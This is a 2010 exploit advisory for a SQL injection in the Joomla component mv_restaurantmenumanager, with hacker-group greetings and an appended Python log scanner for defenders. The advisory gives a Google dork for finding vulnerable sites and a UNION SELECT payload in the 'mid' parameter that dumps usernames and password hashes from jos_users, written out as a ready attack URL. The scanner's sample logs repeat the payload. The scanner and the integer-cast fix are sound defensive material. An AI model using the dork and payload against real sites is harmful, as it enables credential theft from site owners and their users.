Joomla component mv_restaurantmenumanager SQL injection Vulnerability |
========================================================= |
# Exploit Title : Joomla component mv_restaurantmenumanager SQL injection Vulnerability |
# Date : 12 April 2010 |
# Author : Sudden_death |
# Software Link : N/A |
# Tested on : Windows XP 2 |
# Platform/Tested on: Windows XP 2 SP 2 |
# category : webapps/0day |
# myweb : http://suddendeath.000space.com/ |
# dork : inurl:option=com_mv_restaurantmenumanager |
# Code :+and+1=2+union+select+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12+from+jos_users |
====================================================================== |
# EXPLOIT / c0de |
+and+1=2+union+select+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12+from+jos_users |
# VULN IN HERE |
http://localhost/joomla/index.php?option=com_mv_restaurantmenumanager&task=menu_display&Venue=1&mid=5[c0de] |
# EXAMPLE |
http://localhost/joomla/index.php?option=com_mv_restaurantmenumanager&task=menu_display&Venue=1&mid=5+and+1=2+union+select+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12+from+jos_users |
[#]------------------------------------------------------------------- |
GREETZ TO WE FORUM: |
[ indonesianhacker[dot]com | indonesiandefacer[dot]org ] |
[#]------------------------------------------------------------------- |
MY BROTHA : |
| MISTERFRIBO | BobyPutrA | Syst3m_RtO | bumble_be | CS-31 | d43ngCyb3r | Ichito-Bandito | james0baster | |
| kaMtiEz | Man In Black | otong | r3m1ck's | shadowsmaker | SyNTaX ErRoR | iJoo | FLYFF666 | LOL1ds | |
| cah_surip | demnas | RXn7 | and all crew indonesia hacker :D | |
[#]------------------------------------------------------------------- |
note : do not say everything you know, but know everything you say! |
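
For defenders: the advisory places the injection in the `mid` parameter of `com_mv_restaurantmenumanager`, so any request to that component whose decoded `mid` is not a plain integer is worth flagging in access logs. The following is an added example, not part of the original advisory or the component's code; it assumes Apache combined-format logs and that legitimate `mid` values are digits only, and the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

COMPONENT = "com_mv_restaurantmenumanager"   # component named in the advisory
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_mid(request_target):
    """Return the decoded `mid` value if it is not a plain integer, else None."""
    # parse_qs decodes both '+' and %XX, so encoded variants are normalised.
    params = parse_qs(urlsplit(request_target).query, keep_blank_values=True)
    if COMPONENT not in params.get("option", []):
        return None
    for value in params.get("mid", []):
        # Assumption: legitimate menu ids are digits only, as in mid=5.
        if not re.fullmatch(r"[0-9]+", value):
            return value
    return None

def scan(log_lines):
    """Return (line number, client address, decoded mid) per flagged request."""
    hits = []
    for lineno, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        bad = suspicious_mid(match.group(1)) if match else None
        if bad is not None:
            hits.append((lineno, line.split()[0], bad))
    return hits

# Constructed sample log lines (documentation-range addresses, invented timestamps).
BASE = ("/joomla/index.php?option=com_mv_restaurantmenumanager"
        "&task=menu_display&Venue=1&mid=")
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Apr/2010:10:00:01 +0000] "GET ' + BASE
    + '5 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [12/Apr/2010:10:00:09 +0000] "GET ' + BASE
    + '5+and+1=2+union+select+1,2,group_concat(username,0x3a,password),'
    + '4,5,6,7,8,9,10,11,12+from+jos_users HTTP/1.1" 200 6011',
    '198.51.100.7 - - [12/Apr/2010:10:00:12 +0000] "GET ' + BASE
    + '5%20and%201%3D2 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [12/Apr/2010:10:01:30 +0000] '
    '"GET /joomla/index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for lineno, client, value in scan(SAMPLE_LOG):
        print(f"line {lineno}: {client} sent non-integer mid: {value!r}")
```

The same digits-only rule, applied server-side before the value reaches the query (an integer cast or a bound parameter), is what closes the hole; the log check only tells you whether someone has been probing it.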